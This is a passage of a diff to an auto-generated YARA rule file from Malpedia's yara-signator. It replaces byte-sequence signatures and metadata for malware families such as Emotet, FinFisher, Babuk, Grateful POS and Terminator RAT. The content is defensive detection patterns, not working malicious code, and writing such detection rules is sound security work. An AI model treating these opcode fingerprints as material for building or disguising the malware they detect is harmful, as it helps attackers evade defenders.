488b91d0000000 488b442438 ffd2 4885c0 } - $sequence_2 = { eb1f 488db8486a0100 488d15ac5c5000 e8???????? 488db8506a0100 e8???????? 440f11b8586a0100 } - $sequence_3 = { ffd2 b914000000 4889c7 4889de 31c0 488d1da6514200 e8???????? } - $sequence_4 = { ffd1 4883f805 0f85f2100000 0f1005???????? 0f11442478 0f1005???????? 0f11842488000000 } - $sequence_5 = { 746c 4c8b4018 49ffc0 4c394020 7d5f 488d05a3ab1d00 0f1f00 } - $sequence_6 = { 90 488d05cbd28b00 e8???????? 488b442470 4c8b442440 4c8b4c2458 e9???????? } - $sequence_7 = { c6401801 440f113c24 48c744241000000000 488b9c2480000000 4889c1 488bbc24a0000000 488bb424a8000000 } - $sequence_8 = { 90 488d0567839000 e8???????? 8b542440 448b8424b0000000 448b4c2444 89d0 } - $sequence_9 = { eb0f 4889c7 488d159ceb1300 e8???????? 488d0588670a00 488b5c2448 b906000000 } + $sequence_0 = { 668945b7 488d55b7 488d4dd7 e8???????? b862000000 } + $sequence_1 = { 488bcb e8???????? b801000000 4883c430 415e 5f } + $sequence_2 = { e8???????? 488d156f390300 488d4c2420 e8???????? cc 48895c2408 4889742410 } + $sequence_3 = { ff15???????? 483305???????? 488d15bedf0200 488bcb 488905???????? } + $sequence_4 = { 894810 48634810 b802000000 48f7e1 48c7c1ffffffff 480f40c1 } + $sequence_5 = { ff15???????? 8bd8 83f801 0f84c7030000 8bc8 83e902 } + $sequence_6 = { 4c8d0564070000 eb1e 3d03003000 7509 } + $sequence_7 = { 488bc8 488d15a48e0100 ff15???????? 4885c0 0f8432030000 488bc8 e8???????? } + $sequence_8 = { 488944246a 89442472 6689442476 c74424502f006900 c74424546e006400 c744245865007800 c744245c2e006800 } + $sequence_9 = { 488d1590500200 488d4d20 e8???????? cc 48895d08 4883651000 488b86a8000000 } condition: - 7 of them and filesize <19940352 + 7 of them and filesize <714752 } -rule MALPEDIA_Win_Grateful_Pos_Auto : FILE +rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "142dbaaf-bae9-512b-8e1e-de26b0ad1d45" + id = "5291555a-238b-5124-8c5e-fbe5c6dae533" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grateful_pos_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nozelesn_decryptor_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "bd00e16b742e3f98f3581779e2ac022b9c7b51a75c5cf9f592cacfe60dca60a5" + logic_hash = "1af6964230aa159d6a9d9c0e30b792e1839c5e421f268df94cf1e56da3b12562" score = 75 quality = 75 tags = "FILE" @@ -135295,38 +138116,32 @@ rule MALPEDIA_Win_Grateful_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb07 b8fcffffff eb02 33c0 } - $sequence_1 = { 7407 b8f6ffffff eb02 33c0 } - $sequence_2 = { e8???????? 99 b980ee3600 f7f9 } - $sequence_3 = { 7411 e8???????? e8???????? 33c0 e9???????? } - $sequence_4 = { e8???????? 83f801 7510 e8???????? e8???????? } - $sequence_5 = { eb1a b8fdffffff eb13 b8fcffffff } - $sequence_6 = { 8bb5f4fffdff 03b5f8fffdff c1ee03 8b4508 8b7810 } - $sequence_7 = { 6810040000 ff15???????? 8985f4fbffff 83bdf4fbffff00 0f8488010000 8a0d???????? } - $sequence_8 = { 83fa7b 750a 6a01 e8???????? } - $sequence_9 = { 8b4dfc 894110 8b550c 8b420c c1e803 50 } - $sequence_10 = { c745fcffffffff 8d45f4 64a300000000 c3 6a03 e8???????? 59 } - $sequence_11 = { 7c62 8b8df8fffdff 0fb6940dfefffdff 83fa3a 7d4f 8b85f8fffdff } - $sequence_12 = { 6bc02a 05???????? 50 e8???????? 83c40c 85c0 7509 } - $sequence_13 = { 85c0 0f84b2000000 6a03 68???????? 8b8de0fbffff 83e90e } - $sequence_14 = { 8884248e010000 b801000000 486bc03f 488d0d79e50100 0fbe0401 83f04d 8884248f010000 } - $sequence_15 = { 488bcd 418bd7 e8???????? 33c9 85c0 0f85bb010000 4c8d35ee481900 } + $sequence_0 = { 8b459c 8d4dd8 51 8b00 8b701c 8bce e8???????? } + $sequence_1 = { c7401000000000 c7401407000000 668908 c645fc06 8bb5ccfbffff 85f6 0f848d100000 } + $sequence_2 = { 8bc1 83e801 747b 83e801 7466 2d0f010000 7416 } + $sequence_3 = { 3bcf 7c10 7f07 3d???????? 7607 bf???????? eb02 } + $sequence_4 = { 743f 8b7b0c eb28 8b4608 } + $sequence_5 = { 8b5508 85d2 7436 8bc2 8945fc 83fa04 721f } + $sequence_6 = { ff7730 c745fc01000000 8945a0 c645ac00 c645ad00 e8???????? 8d4584 } + $sequence_7 = { e8???????? 837b3800 884340 7510 8b430c 8bcb 83c804 } + $sequence_8 = { 33d7 8945e8 33d6 8bf0 c1c20d 33f1 8bc2 } + $sequence_9 = { 7428 8b03 8d4d90 51 8b7018 8bce e8???????? } condition: - 7 of them and filesize <3964928 + 7 of them and filesize <1122304 } -rule MALPEDIA_Elf_Babuk_Auto : FILE +rule MALPEDIA_Win_Terminator_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0f03a128-b2bf-587f-bb2c-939b9b8a07cd" + id = "9d4805e3-697a-5809-9888-0af99434fee9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.babuk_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.terminator_rat_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "1ffac28a8690c44fcc8b3792df7481d8deebcbe27a55524336d71b5e562fe261" + logic_hash = "460088279758b4b56f7253332ea9c90ec016fa5d0376dce042f468a189f77f7d" score = 75 quality = 75 tags = "FILE" @@ -135340,32 +138155,32 @@ rule MALPEDIA_Elf_Babuk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7e2 89942488020000 898424a4000000 89e8 f7e1 89942484020000 898424a0000000 } - $sequence_1 = { 895c2404 e8???????? eba0 0fb6c1 3d88000000 0f8374020000 c1e007 } - $sequence_2 = { e8???????? 31c0 eb08 898c8490000000 40 83f806 7d5a } - $sequence_3 = { 8b9c2490000000 8d2c18 8d4c0314 8b942400010000 8b8424fc000000 8b9c24f8000000 39c1 } - $sequence_4 = { e8???????? e8???????? 8b442458 8b4018 c680b500000002 8b44247c 8b4c2478 } - $sequence_5 = { e8???????? 0fb644240c 84c0 7539 90 658b0500000000 8b80fcffffff } - $sequence_6 = { 8b492c 8b5c2414 01d3 895904 8b4818 8b492c } - $sequence_7 = { e8???????? e8???????? 658b0500000000 8b80fcffffff 8b4018 8b0c24 894824 } - $sequence_8 = { c1fd1f 21dd 8d3c2e 89bc24f8000000 8b6c2450 e9???????? 39f5 } - $sequence_9 = { 89442408 e8???????? 8b44240c 8b4c2410 890d???????? 890d???????? 8b15???????? } + $sequence_0 = { ffb519010000 8947fc 8b47f4 8b4008 894708 e8???????? 8b47fc } + $sequence_1 = { c70020000000 8b852d010000 2b08 894804 } + $sequence_2 = { 33db 395e0c 752f 6a40 6800100000 6800180000 } + $sequence_3 = { 26a130000000 07 8b400c 8b701c } + $sequence_4 = { 50 ffb525010000 ff95e1000000 85c0 } + $sequence_5 = { eb31 ff9509010000 3d4c270000 750e } + $sequence_6 = { 57 8bfc 81ec04040000 53 56 33db } + $sequence_7 = { 8b4b0c ac 3459 c0c803 3448 c0c803 } + $sequence_8 = { ffb519010000 8947fc 8b47f4 8b4008 } + $sequence_9 = { 60 33c0 8b4f0c 8b7f08 } condition: - 7 of them and filesize <4186112 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Sanny_Auto : FILE +rule MALPEDIA_Win_Client_Maximus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "de370068-b36d-54a3-8d87-5388d41e6079" + id = "9ae68e0c-f7b3-57b3-a5e5-43c9d1c73212" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sanny_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.client_maximus_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "d17095442c6476759b49de20e09af803b9389d5106c74ad1d4cc2616aa104b23" + logic_hash = "b18f0f0d0ef0e4099637c9406b0101b6f1ae3668adb85f5994962285717f3168" score = 75 quality = 75 tags = "FILE" @@ -135379,32 +138194,32 @@ rule MALPEDIA_Win_Sanny_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 8bcb e8???????? 8b5310 68???????? 8d442a08 } - $sequence_1 = { 8b842430060000 8d742410 8d5901 b987000000 53 81ec1c020000 8bfc } - $sequence_2 = { ebd3 53 55 56 57 } - $sequence_3 = { 52 68???????? 56 e8???????? 8b44244c } - $sequence_4 = { 8bc2 c1c60a 03f1 f7d0 0bc6 33c1 } - $sequence_5 = { ae 40 00bcae4000e0ae 40 0023 d18a0688078a } - $sequence_6 = { 55 68???????? 55 e8???????? 8b4c2424 83c410 55 } - $sequence_7 = { 663918 747f 668b11 6683fa41 720c } - $sequence_8 = { f3ab 8b0d???????? aa 898c2408010000 b906000000 33c0 8dbc240d010000 } - $sequence_9 = { 8b44241c 8d9424dc000000 52 50 ffd5 b925000000 33c0 } + $sequence_0 = { 89f0 0fb6c0 0fb61403 88140b 83c101 89fa 81f900010000 } + $sequence_1 = { 89e5 56 53 83ec10 8b1d???????? } + $sequence_2 = { 893424 ff15???????? 83ec08 85c0 7411 } + $sequence_3 = { e8???????? 8b4304 85c0 741d 8b5330 c744240800800000 c744240400000000 } + $sequence_4 = { 39730c 7fe1 891424 e8???????? } + $sequence_5 = { 7429 c70424???????? ff15???????? 83ec04 a3???????? } + $sequence_6 = { 8b4628 85c0 7535 c70424???????? } + $sequence_7 = { a3???????? c7442404???????? 893424 ff15???????? 83ec08 85c0 7411 } + $sequence_8 = { 89c8 0fb63c0b 99 f77c241c 89f8 } + $sequence_9 = { 89f8 02441500 01c6 89f0 0fb6c0 } condition: - 7 of them and filesize <253952 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Typehash_Auto : FILE +rule MALPEDIA_Win_Slothfulmedia_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "edf296ed-fbc4-5bd8-b180-ef55e989c944" + id = "e689a948-8c82-52e0-a234-12c770624669" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.typehash_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slothfulmedia_auto.yar#L1-L171" license_url = "N/A" - logic_hash = "9451e6a97a0b537ea280e22049617c90fd5aa93257a4b129bfda6427a2eb4eeb" + logic_hash = "0fe44aa9ee5461148172e6c82a2b51d37b08cccc220629908d9ee4d92a4c22d4" score = 75 quality = 75 tags = "FILE" @@ -135418,32 +138233,38 @@ rule MALPEDIA_Win_Typehash_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e11f 8b0485e03d4100 8d04c8 eb05 b8???????? f6400420 740d } - $sequence_1 = { c3 8bc8 83e01f c1f905 8b0c8de03d4100 8a44c104 } - $sequence_2 = { e8???????? 6a01 8d4c2450 c68424cc00000001 e8???????? bf???????? } - $sequence_3 = { 8944240c c744241004000000 7460 8b2d???????? 8b3d???????? } - $sequence_4 = { c1f805 c1e603 8d1c85e03d4100 8b0485e03d4100 03c6 8a5004 } - $sequence_5 = { 50 51 6813000020 56 c744242000000000 c744242404000000 ffd7 } - $sequence_6 = { 03c8 3bc1 7d1e 8d1440 2bc8 8d1495e8294100 832200 } - $sequence_7 = { 3bf3 7505 be???????? 8b54242c 8b442430 8bcf 55 } - $sequence_8 = { 837d1805 7538 837d1000 7508 8bb6b42b4100 } - $sequence_9 = { e8???????? 68???????? 8d45c8 c745c8e4e74000 50 } + $sequence_0 = { e9???????? 5f 8d4638 5e } + $sequence_1 = { 8938 8bd8 83c008 8945fc } + $sequence_2 = { 68???????? be04010000 33c9 56 } + $sequence_3 = { 83c002 663bca 75f5 2bc6 d1f8 } + $sequence_4 = { 40 e8???????? bb04010000 53 8d85e0fdffff 50 } + $sequence_5 = { 8b835c040000 68???????? 0564010000 6a05 50 e8???????? 83c418 } + $sequence_6 = { 0fb7f0 f7de 6aff ff7508 } + $sequence_7 = { 8d444606 83c410 0375f0 891c08 ff45fc } + $sequence_8 = { 6689442414 e8???????? 83c40c 6a00 ff15???????? } + $sequence_9 = { ff15???????? 8b8c2410020000 5f 5e 33cc 33c0 } + $sequence_10 = { 68???????? ffd6 85c0 7507 ffd7 83f805 } + $sequence_11 = { 5e 33cc 33c0 e8???????? 81c40c020000 c21000 3b0d???????? } + $sequence_12 = { 8d54240c 6a00 52 e8???????? 83c40c 6804010000 8d44240c } + $sequence_13 = { 6a04 6a00 8d4c2410 51 ff15???????? 8b8c2410020000 5f } + $sequence_14 = { 6a00 ff15???????? 8b35???????? 8b3d???????? 90 68???????? ffd6 } + $sequence_15 = { 68d0070000 ff15???????? 33c0 6806020000 50 } condition: - 7 of them and filesize <180224 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Mailto_Auto : FILE +rule MALPEDIA_Win_Pillowmint_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ea0d0ed3-d3ad-5738-b388-39bdea82080a" + id = "f86758a5-97c5-5c70-a000-bfe6ecf0e5d4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mailto_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pillowmint_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "f253c860f2dfd876ea6c63e66e3d4bfe3e95a5b5178079f30b977b373576f89e" + logic_hash = "33c9d52674ffef90debdc06a4a267346eaf178ee863fdca6106f4bbf407b2817" score = 75 quality = 75 tags = "FILE" @@ -135457,32 +138278,32 @@ rule MALPEDIA_Win_Mailto_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 47 3bfb 7297 8b44241c 8930 8b442420 85c0 } - $sequence_1 = { 83c404 85f6 7429 85ed 7419 8b742414 } - $sequence_2 = { 8b442418 8938 8b44241c 85c0 7402 8930 } - $sequence_3 = { 55 56 57 8b7c2424 c744241400000000 85ff 7457 } - $sequence_4 = { 85f6 0f8477010000 e8???????? 3b7014 0f8469010000 8b0d???????? 85c9 } - $sequence_5 = { 8b08 ff5130 85c0 7822 ff74242c e8???????? } - $sequence_6 = { 897c242c 8bc8 89442420 c1f81a c1f91f 23c8 8bc1 } - $sequence_7 = { 40 eb64 83ff01 7522 0fb6d1 bf02000000 83e203 } - $sequence_8 = { 0fb6466b 884118 0fb6466f 88411c 0fb64652 884101 0fb64656 } - $sequence_9 = { 0f84ef000000 6a20 e8???????? 83c404 89442410 85c0 } + $sequence_0 = { 4883ec48 488b05???????? 4833c4 4889442438 83fa01 0f8580000000 } + $sequence_1 = { 90 4c8bc0 488d1533c00000 488d4d40 e8???????? 90 4c8d051ec00000 } + $sequence_2 = { 488bd8 488b00 80781900 74e9 493bd8 741e 8b4320 } + $sequence_3 = { 4889bc2418010000 c684240801000000 41b810000000 488d155dc00200 488d8c2408010000 e8???????? } + $sequence_4 = { 49c1f803 498bc0 48c1e83f 4c03c0 0f84e0050000 498bd1 4c3bc3 } + $sequence_5 = { ff15???????? ba04010000 488d4c2430 4c8d05a2630300 395c2420 7507 4c8d05ad630300 } + $sequence_6 = { 0f95c0 48ffc0 480faf45df 48ffc8 48014368 48837de710 7209 } + $sequence_7 = { 488bd6 488d4d97 e8???????? 90 4c8d6597 48837daf10 4c0f436597 } + $sequence_8 = { ff15???????? 833d????????04 0f8cf6030000 48c785980000000f000000 4533f6 4c89b590000000 } + $sequence_9 = { 3b3d???????? 0f8392000000 488bc7 4c8bf7 49c1fe05 4c8d2d4bd30100 83e01f } condition: - 7 of them and filesize <180224 + 7 of them and filesize <4667392 } -rule MALPEDIA_Win_Finfisher_Auto : FILE +rule MALPEDIA_Win_Unidentified_094_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3ef79a6b-24c3-58ed-a290-c5a2a7e3fb1b" + id = "f5bdd8f3-d974-5222-9555-3631072a29c0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.finfisher_auto.yar#L1-L148" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_094" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_094_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "dcf5252aa492d908a47d122045beaf12bf03e72009d0665a415b9ab4e015a1e5" + logic_hash = "f3d0ed91e99c9ab03a6ddd24a2a28007a40b7e677077c8b725a5a67f32cc52a7" score = 75 quality = 75 tags = "FILE" @@ -135496,38 +138317,34 @@ rule MALPEDIA_Win_Finfisher_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 6804010000 8d85ccf9ffff 50 } - $sequence_1 = { 56 8d85ccf9ffff 50 e8???????? } - $sequence_2 = { 6a20 6a03 8d8594f7ffff 50 8d8578f7ffff 50 68000000c0 } - $sequence_3 = { 663bc1 7506 8345e404 ebd8 } - $sequence_4 = { 0f853affffff c785d0fbffffd5d8ffff e9???????? 8b07 83e808 } - $sequence_5 = { 52 68a0608000 eb11 8b4708 8b4dd4 } - $sequence_6 = { 397714 7403 56 eb02 6a02 56 50 } - $sequence_7 = { e8???????? 56 e8???????? 8b861c030000 3d10270000 } - $sequence_8 = { 56 8d859cf7ffff 50 56 a1???????? } - $sequence_9 = { 85db 7424 8b17 8d448614 8b08 } - $sequence_10 = { e9???????? 8b859cf7ffff ff7004 ff15???????? 8985c0f7ffff 8b8d9cf7ffff } - $sequence_11 = { 6a09 ff15???????? 3bc6 7490 8bd0 } - $sequence_12 = { ffb5b8f7ffff eb5f 8d8578f7ffff 50 6a01 8d85acf7ffff } - $sequence_13 = { 8d85acfbffff 50 53 56 } + $sequence_0 = { 890d???????? 57 8915???????? a3???????? 83ceff b9???????? } + $sequence_1 = { 6a5c 68???????? e8???????? 83c408 33c9 } + $sequence_2 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? } + $sequence_3 = { 83c310 ff4d0c 0f857ffeffff 5f } + $sequence_4 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? c3 } + $sequence_5 = { 884dff 84d2 7902 341b } + $sequence_6 = { 3055fd 0fb61401 3055fe 0fb6540101 3055ff 8b55fc 89540102 } + $sequence_7 = { 6a00 6a00 6a00 ff15???????? c3 } + $sequence_8 = { 80f31b 8ad3 02d2 84db 7903 80f21b } + $sequence_9 = { 890d???????? 57 8915???????? a3???????? } condition: - 7 of them and filesize <262144 + 7 of them and filesize <524288 } -rule MALPEDIA_Win_Emotet_Auto : FILE +rule MALPEDIA_Win_Owlproxy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "66e086d2-a552-5582-bb27-ef248a857482" + id = "9642ab2d-7dc5-58a6-b1f9-20da6d2b2d38" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.emotet_auto.yar#L1-L609" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.owlproxy_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "0a0e9e76b9d5a85025f54433e276f35bcb5e942e8559eb03880f6fd71aab7315" + logic_hash = "8f3ab8fd440290f6fe4f2136a06c496cf082fcb282138fdbc332de45a924ef6b" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -135539,95 +138356,32 @@ rule MALPEDIA_Win_Emotet_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3c41 7c04 3c5a 7e03 c60158 } - $sequence_1 = { 7e13 3c61 7c04 3c7a 7e0b 3c41 7c04 } - $sequence_2 = { 3c30 7c04 3c39 7e13 3c61 } - $sequence_3 = { c60158 41 803900 75dd } - $sequence_4 = { 33c0 3903 5f 5e 0f95c0 5b 8be5 } - $sequence_5 = { 83c020 eb03 0fb7c0 69d23f000100 } - $sequence_6 = { c1e808 8d5204 c1e910 8842fd 884afe } - $sequence_7 = { 880a 8bc1 c1e808 8d5204 } - $sequence_8 = { 8d5801 f6c30f 7406 83e3f0 } - $sequence_9 = { 8b4604 8b16 8945fc 8d45f8 } - $sequence_10 = { 83c410 8b45fc 0106 294604 } - $sequence_11 = { 03878c000000 50 ff15???????? 017758 } - $sequence_12 = { 8bfa 8bf1 ff15???????? 8b17 83c40c } - $sequence_13 = { 8945fc 8d45f8 6a04 50 ff760c } - $sequence_14 = { 8b17 83c40c 8b4d0c 8bc2 0bc1 83f8ff } - $sequence_15 = { c745fc04000000 50 8d45f8 81ca00000020 50 52 51 } - $sequence_16 = { 66c1e808 4d8d4004 418840fd 418848fe } - $sequence_17 = { 418848fe 66c1e908 418848ff 4d3bd9 72cf } - $sequence_18 = { 2bca d1e9 03ca c1e906 894c2430 } - $sequence_19 = { 418bd0 d3e2 418bcb d3e0 } - $sequence_20 = { 488bd3 488bcf 488b5c2460 4883c450 } - $sequence_21 = { d3e7 83f841 7208 83f85a } - $sequence_22 = { 418808 0fb7c1 c1e910 66c1e808 } - $sequence_23 = { 49895b08 49896b10 49897318 49897b20 4156 4883ec70 } - $sequence_24 = { 48895010 4c894018 4c894820 c3 } - $sequence_25 = { c1e807 46 83f87f 77f7 } - $sequence_26 = { 84c0 75f2 eb03 c60100 } - $sequence_27 = { f7e1 b84fecc44e 2bca d1e9 } - $sequence_28 = { 8bd3 8b0f e8???????? 85c0 } - $sequence_29 = { 7423 8a01 3c30 7c04 } - $sequence_30 = { 83c104 894e04 8b00 85c0 } - $sequence_31 = { 7907 83c107 3bf7 72e8 } - $sequence_32 = { 56 57 6a1e 8d45e0 } - $sequence_33 = { 52 52 52 52 68???????? 52 } - $sequence_34 = { 83ec48 53 56 57 6a44 } - $sequence_35 = { 83f87f 760d 8d642400 c1e807 } - $sequence_36 = { 83f87f 7609 c1e807 41 83f87f 77f7 } - $sequence_37 = { 6a00 6aff 50 51 ff15???????? } - $sequence_38 = { 50 6a00 6a01 6a00 ff15???????? a3???????? } - $sequence_39 = { 6a00 ff75fc 6800040000 6a00 6a00 6a00 } - $sequence_40 = { 50 56 6800800000 6a6a } - $sequence_41 = { 53 56 8bf1 bb00c34c84 } - $sequence_42 = { 56 68400000f0 6a18 33f6 56 56 } - $sequence_43 = { 55 89e5 648b0d18000000 8b4130 83b8a400000006 } - $sequence_44 = { 8b5508 befbffffff c600e9 29d6 01ce 897001 } - $sequence_45 = { 50 51 52 01c8 01d0 } - $sequence_46 = { 8b7d08 83fe00 8945f0 894dec } - $sequence_47 = { 89d6 83c60c 8b7df4 8b4c0f0c } - $sequence_48 = { 8bec 83ec08 56 57 8bf1 33ff } - $sequence_49 = { 51 8d4df8 51 ff75f8 50 6a03 6a30 } - $sequence_50 = { 8b466c 5f 5e 5b 8be5 5d } - $sequence_51 = { 8b5d08 b8afa96e5e 56 57 00b807000000 008b45fc33d2 00b871800780 } - $sequence_52 = { 8bf1 bb00c34c84 57 33ff } - $sequence_53 = { 83ec10 53 6a00 8d45fc } - $sequence_54 = { 6a03 6a00 6a00 ff7508 53 50 } - $sequence_55 = { 8b7020 8b7840 89c3 83c33c } - $sequence_56 = { c605????????00 0fb6d8 e8???????? 0fb6c3 } - $sequence_57 = { e8???????? 84c0 7519 33c9 } - $sequence_58 = { ff15???????? 83f803 7405 83f802 751e } - $sequence_59 = { 7519 33c9 0f1f4000 0fb6840c30010000 } - $sequence_60 = { 743e 8b5c2430 85db 741d } - $sequence_61 = { 8bf8 e8???????? eb04 8b7c2430 } - $sequence_62 = { 31c9 89e2 31f6 89720c 897208 } - $sequence_63 = { 488d15e70f0000 e8???????? 84c0 0f84f1000000 48899c2480030000 } - $sequence_64 = { 84c0 7466 0f1f4000 488b9c2448040000 4885db } - $sequence_65 = { 8b4a48 894e20 83c418 5e c3 } - $sequence_66 = { 8b4c241c 0f44c8 2b5134 8b442420 890424 89542404 894c2418 } - $sequence_67 = { 897204 8932 8b15???????? 8944247c f20f11442470 } - $sequence_68 = { 813c3850450000 0f44f5 895e34 890424 } - $sequence_69 = { e8???????? 8d0d2231d800 890424 894c2404 e8???????? 8b4c242c 894130 } - $sequence_70 = { 8bf8 85ff 7443 be???????? e8???????? } - $sequence_71 = { 8b442450 894c2414 8b4c2418 8908 } - $sequence_72 = { 8b5010 51 52 c745f48072e601 e8???????? 8bd8 85db } + $sequence_0 = { 488d942450010000 488d8c2430010000 e8???????? 90 4c8d842430010000 4883bc244801000008 4c0f43842430010000 } + $sequence_1 = { 488bcb 488905???????? ff15???????? 488d151b580100 483305???????? 488bcb 488905???????? } + $sequence_2 = { 4889442428 488d442450 4533c0 488bcf 664489a588010000 4889442420 ff15???????? } + $sequence_3 = { 488d4c2440 e8???????? eb27 49c747180f000000 49c7471000000000 41c60700 4533c0 } + $sequence_4 = { e8???????? 448bc0 488bd3 488bce e8???????? 84c0 7406 } + $sequence_5 = { e8???????? 90 488b4527 4c8b4d0f 6690 48837de700 740a } + $sequence_6 = { 4c8bc6 498bd7 488d0c28 e8???????? 4c8b4708 488b542478 } + $sequence_7 = { f6c101 7527 458bc6 488d156ee10000 663b1a } + $sequence_8 = { 4889442428 488d054eff0100 4889442440 488b442468 48634804 488d0581fe0100 4889440c68 } + $sequence_9 = { 89442420 4c8bce 4533c0 488b5610 488b4da8 ff15???????? 85c0 } condition: - 7 of them and filesize <733184 + 7 of them and filesize <475136 } -rule MALPEDIA_Win_Batchwiper_Auto : FILE +rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cb044b8c-027b-5368-bd79-45da5d915947" + id = "b171d237-d33f-5b2c-9bb0-c659a34a40b8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.batchwiper_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_qbp_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "14983b1d6532d433e6ad6924f17da812f5983b6eabd0fde8fd8892a9d3b6fb0b" + logic_hash = "d54f700be976af1656f6aaefd7f02b0196b5db00252f63d6c12db29d09a9a088" score = 75 quality = 75 tags = "FILE" @@ -135641,32 +138395,32 @@ rule MALPEDIA_Win_Batchwiper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c001 8bce c1e908 330c9de8904000 } - $sequence_1 = { 8b0424 894510 8b442408 894514 8b442404 } - $sequence_2 = { 8b442408 894514 8b442404 894518 8d44240c } - $sequence_3 = { e8???????? 50 31db 3b1c24 756b } - $sequence_4 = { 89d8 e8???????? 89c3 83fb01 7531 ff35???????? } - $sequence_5 = { 83fb01 7531 ff35???????? ba???????? e8???????? 8b15???????? e8???????? } - $sequence_6 = { e8???????? 89c3 83fb01 7531 ff35???????? ba???????? } - $sequence_7 = { e8???????? 8d0d28b14000 5a 